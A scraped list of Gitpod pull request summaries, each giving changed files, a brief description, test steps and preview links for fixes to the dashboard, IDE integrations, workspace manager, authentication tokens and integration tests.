3. Clear the indexed db so that the caches are not used (can be done in …
> Fix inconsistent autostart data on ws creation

- components/dashboard/src/components/podkit/breadcrumbs/BreadcrumbNav.tsx
It's not much but it's honest work
| <img width="681" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/fc6fb1d9-4774-4033-8470-9559549d4f28"> | <img width="681" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/f7712db0-4578-4b1d-b602-5b4c41d9e9ee"> | 
Fixes EXP-1694
<ul>
<li><b>🏷️ Name</b> - ft-fix-breb10ee906b1</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-breb10ee906b1.preview.gitpod-dev.com/workspaces" target="_blank">ft-fix-breb10ee906b1.preview.gitpod-dev.com/workspaces</a>.</li> …
> Fix breadcrumb padding

- components/dashboard/src/components/IdeOptions.tsx
- components/dashboard/src/components/podkit/breadcrumbs/BreadcrumbNav.tsx
|Breadcrumb|
|:-:|
|<img width="543" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/eb1822c6-8c24-4535-b37e-4cdd1223034a">|
|Before| After|
|:-:|:-:|
|<img width="1541" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/c016b904-6a20-4ddb-b680-c4ca1348c4fc">|<img width="1582" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/51f309a7-1e15-42ab-b742-6b765d0a7ee5">|
Fixes EXP-1712
Relates EXP-1694
- Check org settings and repo settings's editor icon size, it should be 20px
- Breadcrumb's gap should be the same
<ul>
<li><b>🏷️ Name</b> - hw-exp-1712</li>
<li><b>🔗 URL</b> - <a href="https://hw-exp-1712.preview.gitpod-dev.com/workspaces" …
> Align design to editor icon and breadcrumb

- components/ws-manager-mk2/main.go
[ws-mananger-mk2] fix metrics
|  Before | After  |
|---|---|
|  <img width="1865" alt="image" src="https://github.com/gitpod-io/gitpod/assets/8299500/d531e6bf-0a37-4dae-83c9-7abd6c0c3eda"> |  <img width="1932" alt="image" src="https://github.com/gitpod-io/gitpod/assets/8299500/1cd2035a-f9d2-4abc-af0a-e1877aef0cdb"> |
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [ws-mananger-mk2] fix metrics

- components/image-builder-mk3/go.mod
- components/image-builder-mk3/go.sum
- components/image-builder-mk3/pkg/orchestrator/orchestrator.go
- components/image-builder-mk3/pkg/resolve/resolve.go
- components/image-builder-mk3/pkg/resolve/resolve_test.go
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [image-builder-mk3] always resolved image even it already in digest

- components/ide/jetbrains/backend-plugin/launch-dev-server.sh
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodMetricControlProvider.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodPortForwardingService.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodTerminalService.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodManager.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/actions/GitpodCopyWebUrlAction.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/latest/GitpodMetricControlProvider.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/latest/GitpodPortForwardingServiceImpl.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/latest/GitpodTerminalService.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/services/ControllerStatusService.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/stable/GitpodMetricControlProvider.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/stable/GitpodPortForwardingServiceImpl.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/stable/GitpodTerminalService.kt
- components/ide/jetbrains/backend-plugin/src/main/resources-latest/META-INF/extensions.xml
- components/ide/jetbrains/backend-plugin/src/main/resources-stable/META-INF/extensions.xml
- components/ide/jetbrains/backend-plugin/src/main/resources/META-INF/plugin.xml
- components/ide/jetbrains/launcher/main.go
- install/installer/pkg/components/ide-service/ide_config_configmap.go
JetBrains will load plugins if it’s bundled in `/home/gitpod/.local/share/JetBrains/<product_name_and_version>` and listed on [plugin-classpath.txt](https://github.com/JetBrains/intellij-community/blob/c5e6a820cfb3d1d0d3bec91743db0442fb8e792d/platform/core-impl/src/com/intellij/ide/plugins/ProductLoadingStrategy.kt#L107). 
But we’d better not modify plugin-classpath.txt, so make plugin locate on configDir will make it works because we customized it [here](https://github.com/gitpod-io/gitpod/blob/hw/jb/components/ide/jetbrains/launcher/main.go#L672)
Fixes EXP-1722
- Open workspace with stable and latest IntelliJ https://github.com/Gitpod-Samples/spring-petclinic
- It should work on versions (`stable`, `latest` and `2022.3.3`) with features below
- Port-forwarding
- Terminal tasks attached …
> [JetBrains] fix EAP backend-plugin not start issue

- components/ide/jetbrains/launcher/main.go
Fixes EXP-1722
✅ https://github.com/gitpod-io/gitpod/pull/19595#issuecomment-2033863079
Test with repo
- `https://github.com/Gitpod-Samples/spring-petclinic`
- `https://github.com/gitpod-io/empty`
With steps
- Open workspace with stable and latest IntelliJ
- It should work on versions (`stable`, `latest`) with features below
- Command like `gp open README.md` works
- Remote indicator is correct on thin client
- Restart workspace, restarted one should work well like before
<ul>
<li><b>🏷️ Name</b> - hw-fix-jb2</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-jb2.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-jb2.preview.gitpod-dev.com/workspaces</a>.</li> …
> [JetBrains] fix mk plugin dir failed

- components/node-labeler/cmd/run.go
- install/installer/pkg/components/registry-facade/daemonset.go
Delay initial registry-facade health checks to avoid nodeport issues
<ul>
<li><b>🏷️ Name</b> - aledbf-delay</li>
<li><b>🔗 URL</b> - <a href="https://aledbf-delay.preview.gitpod-dev.com/workspaces" target="_blank">aledbf-delay.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - aledbf-delay-gha.24125</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-aledbf-delay%22%0A%0A--%20Filter% …
> Increase initial healthcheck start

- components/dashboard/package.json
- components/dashboard/src/components/SelectWorkspaceClassComponent.tsx
- components/dashboard/src/data/configurations/configuration-queries.ts
- components/dashboard/src/data/ide-options/ide-options-query.ts
- components/dashboard/src/data/workspaces/workspace-classes-query.ts
- yarn.lock
I checked *How to test* section, only `useConfiguration` needs care, which is caused by no `cacheTime`
Fixes #
Add logs on dashboard for queries on create workspace page, like `useConfiguration` `useOrgSettingsQuery` `useIDEOptions` `useWorkspaceClasses`
Make sure they're called in only when needed when you change options on create page
<ul>
<li><b>🏷️ Name</b> - hw-query-improve</li>
<li><b>🔗 URL</b> - <a href="https://hw-query-improve.preview.gitpod-dev.com/workspaces" target="_blank">hw-query-improve.preview.gitpod-dev.com/workspaces</a>.</li> …
> Improve queries on workspace start page

- components/server/src/workspace/workspace-starter.ts
Use proper error code when repo is blocked
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Use proper error code when repo is blocked

- components/server/src/auth/authenticator.ts
- components/server/src/container-module.ts
- components/server/src/jobs/installation-admin-cleanup.ts
- components/server/src/jobs/runner.ts
Installation admins should not be allowed to create SCM connections, as this leads to a lot of confusion and dead-end situations in Dedicated cells. This PR add a clean-up routine and block new SCM connections. 
Fixes EXP-1684
<ul>
<li><b>🏷️ Name</b> - at-admin-cleanup</li>
<li><b>🔗 URL</b> - <a href="https://at-admin-cleanup.preview.gitpod-dev.com/workspaces" target="_blank">at-admin-cleanup.preview.gitpod-dev.com/workspaces</a>.</li> …
> Clean up SCM connections of installation admin

- WORKSPACE.yaml
- components/ide/code/leeway.Dockerfile
- install/installer/pkg/components/ide-service/ide_config_configmap.go
- install/installer/pkg/components/workspace/ide/constants.go
Update code to `1.88.0`
<ul>
<li><b>🏷️ Name</b> - jp-fancy-urial</li>
<li><b>🔗 URL</b> - <a href="https://jp-fancy-urial.preview.gitpod-dev.com/workspaces" target="_blank">jp-fancy-urial.preview.gitpod-dev.com/workspaces</a>.</li> …
> [code] Update code 1.88

- components/dashboard/src/components/QuickStart.tsx
This PR aims to fix the situation where you try to pass [one-off environment variables](https://www.gitpod.io/docs/configure/repositories/environment-variables#providing-one-time-environment-variables-via-the-context-url) to a workspace.
Fixes EXP-1767
Visit `/quickstart/#var=value,var2=value2/https://github.com/gitpod-io/new`, both env vars should be injected into the opened repo.
<ul>
<li><b>🏷️ Name</b> - ft-normali0d3d458493</li>
<li><b>🔗 URL</b> - <a href="https://ft-normali0d3d458493.preview.gitpod-dev.com/workspaces" target="_blank">ft-normali0d3d458493.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a4 …
> Account for passed env vars with quickstart

- install/installer/pkg/components/ide-service/ide_config_configmap.go
Progress of testing and validating progress: 
- fails with https://www.jetbrains.com/rider/nextversion/
Preview env: https://ak-revert-2024-jb.preview.gitpod-dev.com/workspaces
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [jb] add 2023.3 versions back

- install/installer/pkg/components/ide-service/ide_config_configmap.go
Remove clion versions
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [jb] Remove clion versions

- components/dashboard/src/components/Modal.tsx
Increase modal dialog min width
https://jp-novel-narwhal.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Increase modal dialog min width

- components/dashboard/src/teams/JoinTeam.tsx
When you join some org, it should become your current one effectively. 
<ul>
<li><b>🏷️ Name</b> - at-switch-b45e9bf411</li>
<li><b>🔗 URL</b> - <a href="https://at-switch-b45e9bf411.preview.gitpod-dev.com/workspaces" target="_blank">at-switch-b45e9bf411.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - at-switch-to-joined-org-gha.24286</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22pre …
> [dashboard] switch to org on join

- components/dashboard/src/components/IdeOptions.tsx
- components/dashboard/src/components/Modal.tsx
- components/dashboard/src/components/SelectIDEComponent.tsx
- components/dashboard/src/user-settings/SelectIDE.tsx
This change aims to give us more real estate in the available editors modal in the organization settings by not showing `Desktop` as the type for every JetBrains IDE, which are all desktop and do not offer a browser-based alternative.
https://gitpod.slack.com/archives/C05H5UQBW6Q/p1713082398905009?thread_ts=1712779784.619919&cid=C05H5UQBW6Q
Go to the org settings and try to configure available editors. There should be enough room in the UI even for version pinning of IntelliJ IDEA.
https://ft-jb-hide-label.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> Do not show Editor type for JB

- components/server/src/github/github-context-parser.ts
We have nice checking for a broken connection to our GitHub OAuth app, but the condition that needed to be met was not, because the error we threw did not have a `.code` property. This PR ensures a nicer UX which enables the user to reconnect the GitHub App if necessary.
| ![image](https://github.com/gitpod-io/gitpod/assets/29888641/8bf81f51-d8bb-4bec-b740-563b554d5df5) | <img width="651" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/fb984f50-c0e5-4d6a-9a20-06fb8d589f12"> | 
Small part of the solution for EXP-1803
1. Log in to the preview env
2. On github.com, revoke access to the harvester OAuth app
3. Try to create a workspace with a GitHub URL. You should be reprompted to authenticate.
<p>Gitpod was successfully deployed to …
> Fix checking 401 error for GitHub

- components/server/src/bitbucket/bitbucket-auth-provider.ts
Aligned with official docs on BB scopes:
https://developer.atlassian.com/cloud/bitbucket/bitbucket-cloud-rest-api-scopes/
For the reviewer, please proofread the related section in the linked docs and pay attention to the implied scopes. 
<ul>
<li><b>🏷️ Name</b> - at-bb-imply-scopes</li>
<li><b>🔗 URL</b> - <a href="https://at-bb-imply-scopes.preview.gitpod-dev.com/workspaces" target="_blank">at-bb-imply-scopes.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 …
> [bitbucket.org] fix normalizeScopes

- components/ide-service/pkg/server/ideconfig.go
- install/installer/BUILD.yaml
- install/installer/pkg/components/ide-service/ide-configmap.json
- install/installer/pkg/components/ide-service/ide_config_configmap.go
Introduces a JSON file, which will act as a single source of truth for the IDE configmap of `ide-service`. This change is made in order to enable its automatic change when new JetBrains IDEs are released (pending follow-up PR).
Fixes EXP-1805
Test that all IDEs still launch properly.
You can also compare the configmap - it should be the same as it was before these changes.
```
kubectl get cm ide-config -o yaml > configmap.yaml
```
<ul>
<li><b>🏷️ Name</b> - ft-ide-condcfaf3a439</li>
<li><b>🔗 URL</b> - <a href="https://ft-ide-condcfaf3a439.preview.gitpod-dev.com/workspaces" target="_blank">ft-ide-condcfaf3a439.preview.gitpod-dev.com/workspaces</a>.</li> …
> Store ide configmap in a json file

- components/dashboard/src/data/workspaces/listen-to-workspace-ws-messages.ts
- components/dashboard/src/data/workspaces/listen-to-workspace-ws-messages2.test.ts
- components/dashboard/src/data/workspaces/listen-to-workspace-ws-messages2.ts
- components/dashboard/src/service/service.tsx
- components/dashboard/src/start/StartWorkspace.tsx
Remove race conditions
- **Network** Use the same watch streaming request on `service.tsx` and `StartWorkspace.tsx` page
-  **Render** Add complete (similar with  expresss.next) to make sure `StartWorkspace` is rendered before `Service.tsx` render (setTimeout 0 to wait React render next frame)
See also [[internal chat](https://gitpod.slack.com/archives/C05H5UQBW6Q/p1712927029262389?thread_ts=1712926365.740049&cid=C05H5UQBW6Q)]
Fixes EXP-1621
- Record your screen
- Stop workspace via `gp stop`
- There should have no `starting` screen shows
<ul>
<li><b>🏷️ Name</b> - hw-status-ordering</li>
<li><b>🔗 URL</b> - <a href="https://hw-status-ordering.preview.gitpod-dev.com/workspaces" …
> Fix one frame starting on workspace stopping page

- components/ws-manager-api/go/crd/v1/workspace_types.go
- components/ws-manager-mk2/controllers/status.go
- components/ws-manager-mk2/controllers/timeout_controller.go
- components/ws-manager-mk2/controllers/workspace_controller.go
* Record phase transitions, rather record phase each time we reconcile
* Add OWI to log instances
* Avoid logging workspace name in workspace_types.go, as it contains org and repo info.
Fixes ENG-2016
Start a workspace and observe the logs. Also, results stored [here](https://github.com/gitpod-io/gitpod/pull/19635#issuecomment-2064659417).
<ul>
<li><b>🏷️ Name</b> - kylos101-s8bc1d869e7</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-s8bc1d869e7.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-s8bc1d869e7.preview.gitpod-dev.com/workspaces</a>.</li> …
> [ws-manager-mk2] logging improvements

- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
We were treating the hash as immutable, but that is simply not the case, and changing it does not trigger any page reload.
Fixes EXP-1794
Try to go on the new workspace page with a context URL and, without any reloads, change the URL hash. The UI should take the new URL into account.
<ul>
<li><b>🏷️ Name</b> - ft-create-816bcbeb3e</li>
<li><b>🔗 URL</b> - <a href="https://ft-create-816bcbeb3e.preview.gitpod-dev.com/workspaces" target="_blank">ft-create-816bcbeb3e.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to interact …
> Fix changing URL hash on `/new`

- components/dashboard/src/components/SelectIDEComponent.tsx
- components/dashboard/src/onboarding/StepPersonalize.tsx
- components/dashboard/src/user-settings/SelectIDE.tsx
- install/installer/pkg/components/ide-service/ide-configmap.json
IDE versions were previously shown in user preferences, but workspaces are not based on user preferences - the versions used are fetched from the organization's config. Because of this, we are changing these UIs to hide the version, and only show it in the create workspace page, where the version which will actually be used is shown.
Fixes EXP-1801
<ul>
<li><b>🏷️ Name</b> - ft-user-pr1e95611825</li>
<li><b>🔗 URL</b> - <a href="https://ft-user-pr1e95611825.preview.gitpod-dev.com/workspaces" target="_blank">ft-user-pr1e95611825.preview.gitpod-dev.com/workspaces</a>.</li> …
> Hide editor versions for user prefs

- .github/workflows/ide-integration-tests.yml
Fixes https://github.com/gitpod-io/gitpod/actions/workflows/ide-integration-tests.yml
Check latest job of https://github.com/gitpod-io/gitpod/actions/workflows/ide-integration-tests.yml, it's triggered with current branch and Configuration step should be succeed
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a …
> Fix GHA ide integration tests

- components/gitpod-cli/cmd/idp-gcloud-token.go
- components/gitpod-cli/cmd/idp-token.go
- components/gitpod-cli/go.mod
- components/gitpod-cli/go.sum
- components/public-api-server/pkg/apiv1/identityprovider.go
- components/public-api-server/pkg/apiv1/identityprovider_test.go
- components/public-api-server/pkg/identityprovider/cache.go
- components/public-api-server/pkg/identityprovider/cache_test.go
This PR bring bunch of idp improve
1. add repository claim, this is because context is not stable, and difficult to use as an assert
2. add the missing `use` field for key cache [ref](https://datatracker.ietf.org/doc/html/rfc7517#section-4.2) Although it is optional, adding it would be better as some SPs require verification.
3. simplify logic for `idp token --decode` command
4. add gcloud-format token support [test below]
Fixes #
<ul>
<li><b>🏷️ Name</b> - pd-idp-improve</li>
<li><b>🔗 URL</b> - <a href="https://pd-idp-improve.preview.gitpod-dev.com/workspaces" target="_blank">pd-idp-improve.preview.gitpod-dev.com/workspaces</a>.</li> …
> [idp] improve idp

- components/server/src/user/token-service.ts
- components/server/src/workspace/workspace-starter.ts
We are experimenting with forcing the access tokens used by workspace starter to be valid at least for 50 more minutes. This is because some bitbucket installations seem to be misbehaving and giving us a hard time when cloning repos after image builds.
Fixes 
I tested this by debugging the server (`/components/dashboard/debug.sh`) and seeing what the expiration value requested by the `getTokenForHost` is. 
<ul>
<li><b>🏷️ Name</b> - ft-token-validity</li>
<li><b>🔗 URL</b> - <a href="https://ft-token-validity.preview.gitpod-dev.com/workspaces" target="_blank">ft-token-validity.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d040 …
> Enhance token long and experiment with longer token validity expectation

- components/ws-daemon/pkg/container/config.go
- components/ws-daemon/pkg/container/containerd.go
- components/ws-daemon/pkg/daemon/config.go
- install/installer/pkg/components/ws-daemon/configmap.go
Ensure predictable order of component start: containerd -> registry-facade -> ws-daemon
- check node-labeler logs, we should always see registry-facade label being set before ws-daemon
<ul>
<li><b>🏷️ Name</b> - aledbf-ws-6700e0f0d2</li>
<li><b>🔗 URL</b> - <a href="https://aledbf-ws-6700e0f0d2.preview.gitpod-dev.com/workspaces" target="_blank">aledbf-ws-6700e0f0d2.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - aledbf-ws-daemon-check-gha.24608</li> …
> [ws-daemon] Change readiness behavior to wait for registry-facade

- components/ws-daemon/pkg/container/config.go
- components/ws-daemon/pkg/container/containerd.go
- components/ws-daemon/pkg/daemon/config.go
- install/installer/pkg/components/ws-daemon/configmap.go
Reverts gitpod-io/gitpod#19668
> Revert "Revert "[ws-daemon] Change readiness behavior to wait for registry-facade""

- components/blobserve/go.mod
- components/blobserve/go.sum
- components/gitpod-cli/go.mod
- components/registry-facade/go.mod
- components/registry-facade/go.sum
- components/registry-facade/pkg/registry/registry.go
- install/installer/go.mod
- install/installer/go.sum
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Update go-redis to v9.5.1

- .github/workflows/build.yml
[github action] change contents permission to write so that github action can create a release
failure case https://github.com/gitpod-io/gitpod/actions/runs/8852933272/job/24320257571
see [document](https://docs.github.com/en/actions/using-jobs/assigning-permissions-to-jobs#:~:text=Work%20with%20the%20contents%20of%20the%20repository.%20For%20example%2C%20contents%3A%20read%20permits%20an%20action%20to%20list%20the%20commits%2C%20and%20contents%3A%20write%20allows%20the%20action%20to%20create%20a%20release.%20For%20more%20information%2C%20see)
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add desired feature …
> [github action] change contents permission to write

- components/server/src/auth/generic-auth-provider.ts
- components/server/src/user/token-service.ts
For one server log the severity was too low and for the error telling us the access token refresh fail we could not correlate that by user ids. This fixes both of these issues.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Log refresh token failures with user id ctx

- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/data/usage/usage-query.ts
- components/dashboard/src/usage/UsageView.tsx
- components/usage/go.mod
- components/usage/go.sum
- components/usage/pkg/server/server.go
- components/usage/pkg/server/server_test.go
- install/installer/pkg/components/usage/configmap.go
- install/installer/pkg/components/usage/configmap_test.go
Add FF `usage_update_scheduler_duration` to control repeat duration of usage data update
- Default is `15m`, see [ops](https://github.com/gitpod-io/ops/blob/0266f434887dbb517256f3c85c1824cfd2f9597d/deploy/production/meta-us02/app/installer-config.yaml#L190)
- Feature Flag [[non-production](https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=337069)]
Fixes EXP-1768
- Create workspace, stop workspace
- Usage page should show workspace was stopped after you stop it after 1 minute (based on [FF](https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=337069) setting)
- Update FF should affect scheduler, after …
> Update usage scheduler according to FF

- components/server/src/auth/jwt.spec.ts
- components/server/src/auth/jwt.ts
- components/server/src/session-handler.ts
This change makes sure we issue a new token regularly in case their is a new signing key. This makes sure that people using Gitpod can be transitioned to a new token smoothly, without them noticing.
Context: EXP-1842
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] Issue new token in case of new signing key

- dev/preview/workflow/preview/deploy-gitpod.sh
- dev/preview/workflow/preview/preview.sh
This helps avoid the scenario where the image-pull-secret is added to the monitoring-satellite namespace, and not our default namespace (which I am encountering on main, when doing `leeway run dev:preview` from a local branch).
Fixes n/a
`leeway run dev:preview` from a local branch, all pods should enter ready
and
Can start a workspace from the preview made by this PR's build 
<ul>
<li><b>🏷️ Name</b> - kylos101-fix-preview</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-fix-preview.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-fix-preview.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29e …
> [preview] deploy monitoring after gitpod is deployed

- dev/loadgen/configs/prod-benchmark.yaml
It moved from gitpod-io to gitpod-samples.
Related to ENT-13
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [loadgen] fix the org associated with template repos

- components/ws-manager-mk2/main.go
This helps unblock consumers, such as gRPC and controller reconcilation.
The side effects are:
* the longest running reconcilation for mk2 is no longer 2s, it floats between 250-600ms.
* mk2  workqueue latency is consistent, and the duration doesn't become excessive anymore.
* mk2 work queue depth is high now, but, flattens as start workspace requests cease, and drops as workspaces stop (MarkActive volume)
* increased memory utilization for the API server (it doubles)
Thanks for pairing on this, @aledbf ! I never would have that the k8s client was rate limited!!
Fixes ENT-13, ENG-1940
Loadgen for many workspaces (10x what we usually do)
gitpod:summary
<details>
</details>
<details> …
> [ws-manager-mk2] allow the k8s client a higher limit

- components/dashboard/src/components/InputWithCopy.tsx
- components/dashboard/src/dedicated-setup/SetupCompleteStep.tsx
- components/dashboard/src/utils.ts
- components/dashboard/src/workspaces/ConnectToSSHModal.tsx
- components/supervisor/frontend/src/shared/loading-frame.ts
Writing to the clipboard can throw. We deal with that now.
In addition to that, one needs to allow cross-origin iframes to write to the clipboard, which we did not do and so copying did not work.
Fixes ENT-5 EXP-1737
Use a Chromium based browser like Chrome, Arc, Brave.
1. Start a workspace with a non-vscode browser editor
2. On the start page, try to copy the SSH command
<ul>
<li><b>🏷️ Name</b> - ft-catch-c4866f0f606</li>
<li><b>🔗 URL</b> - <a href="https://ft-catch-c4866f0f606.preview.gitpod-dev.com/workspaces" target="_blank">ft-catch-c4866f0f606.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff273 …
> Deal with clipboard permission issues

- components/dashboard/src/components/podkit/combobox/Combobox.tsx
Don't "select" unselectable placeholder items in the combobox
Fixes https://linear.app/gitpod/issue/ENT-32/[dashboard]-dont-select-unselectable-element
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] don't select non-selectable element

- components/common-go/experiments/flags.go
- components/supervisor/pkg/supervisor/supervisor.go
- components/supervisor/pkg/supervisor/supervisor_test.go
Remove setting Xmx to the containers memory size
Fixes #
<ul>
<li><b>🏷️ Name</b> - se-jvm-xmx</li>
<li><b>🔗 URL</b> - <a href="https://se-jvm-xmx.preview.gitpod-dev.com/workspaces" target="_blank">se-jvm-xmx.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-jvm-xmx-gha.24929</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-se-jvm-xmx%22%0A%0A--%20Filter%20on%20service:%0A--%2 …
> [supervisor] remove JAVA_TOOL_OPTIONS hack

- components/gitpod-protocol/src/protocol.ts
- components/ws-manager-bridge/src/bridge.spec.ts
- components/ws-manager-bridge/src/bridge.ts
- components/ws-manager-bridge/src/metrics.ts
Only handles updates if there was a (relevant) change to the last one for that instanceId:
On a simple workspace start/stop cycle this means 11 of 22 events got "skipped".
```
gitpod /workspace/gitpod (gpl/49-bridge-updates) $ curl localhost:9500/metrics | grep update_completed
[...]
gitpod_ws_manager_bridge_workspace_instance_update_completed_seconds_count{workspace_cluster="dev",workspace_instance_type="regular",outcome="success"} 11
[...]
gitpod_ws_manager_bridge_workspace_instance_update_completed_seconds_count{workspace_cluster="dev",workspace_instance_type="regular",outcome="skipped"} 11
```
Fixes ENT-49
- [start a workspace](https://gpl-49-bri18e6cd4176.preview.gitpod-dev.com/#github.com/gitpod-io/gitpod) in the preview environment, try to modify it (ports) and stop it again …
> [bridge] Remember last status update, and skip if they are identical

- .github/workflows/workspace-integration-tests.yml
To help support in the event of future, sustained failed runs.
Related to ENT-13
n/a
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [.github] integration test comments

- operations/observability/mixins/cross-teams/dashboards/gitpod-grpc-server.json
- operations/observability/mixins/meta/dashboards/components/ws-manager-bridge.json
The ws-manager-bridge dashboard was not querying parameters when time was changed. As a result, it looked like we were missing large portions of data when new pods encountered.
The gRPC server dashboard rate of 1m was too small. This is fine for PAYG, however, it is too granular for Enterprise (causing panes to be empty).
@geropl for 👀 , we bumped into the bridge behavior yesterday. I bumped into the 1m rate issue today when responding to an alert for dogfood.
Fixes n/a
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [obs] a couple QOL improvements

- .github/workflows/code-nightly.yml
- install/installer/pkg/components/ide-service/ide-configmap.json
- install/installer/pkg/components/workspace/ide/constants.go
Upgrade Browser VS Code to 1.89.0
Tested on https://github.com/gitpod-io/gitpod/pull/19704. So we can check about page's commit sha with stable code
<ul>
<li><b>🏷️ Name</b> - hw-vs-1890</li>
<li><b>🔗 URL</b> - <a href="https://hw-vs-1890.preview.gitpod-dev.com/workspaces" target="_blank">hw-vs-1890.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-vs-1890-gha.25000</li> …
> [code] upgrade Browser VS Code to 1.89.0

- components/server/src/workspace/workspace-starter.ts
imageBuildFailedUser got reported as startOnClusterFailed: 
Follow up for https://github.com/gitpod-io/gitpod/pull/19705
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] Fix mistaken re-classification of workspace start errors

- components/server/src/billing/entitlement-service.ts
- dev/preview/infrastructure/modules/gce/variables.tf
- dev/preview/infrastructure/variables.tf
- dev/preview/workflow/preview/deploy-gitpod.sh
- test/tests/components/ws-manager/prebuild_test.go
- test/tests/workspace/process_priority_test.go
A few tests have been consistently failing.
1. **TestNetworkLimiting** was failing because the user we use for testing in previews does not use UBP, and the default is not to network limit for those users. I've changed `server`, so that we always limit network connections regardless of billing mode, and to also limit if there was an error inspecting the billing mode.
2. **TestProcessPriority** was failing because it was running the assertion too early. We need to give `ws-daemon` time to apply process priority before asserting priority has been adjusted.
3. **TestOpenWorkspaceFromPrebuild** had a couple problems. First, `grep` needs to be set to explicitly recurse through folders (it was failing on the logs folder). Second, the test wasn't waiting for a workspace to stop, prior to …
> [test] fix integration tests

- WORKSPACE.yaml
Build code `1.89.1`
<ul>
<li><b>🏷️ Name</b> - hw-vs-1891</li>
<li><b>🔗 URL</b> - <a href="https://hw-vs-1891.preview.gitpod-dev.com/workspaces" target="_blank">hw-vs-1891.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-vs-1891-gha.25090</li>
<li><b>🗒️ …
> Build code 1.89.1

- .devcontainer/Dockerfile
- .devcontainer/devcontainer.json
- WORKSPACE.yaml
- dev/install-dependencies.sh
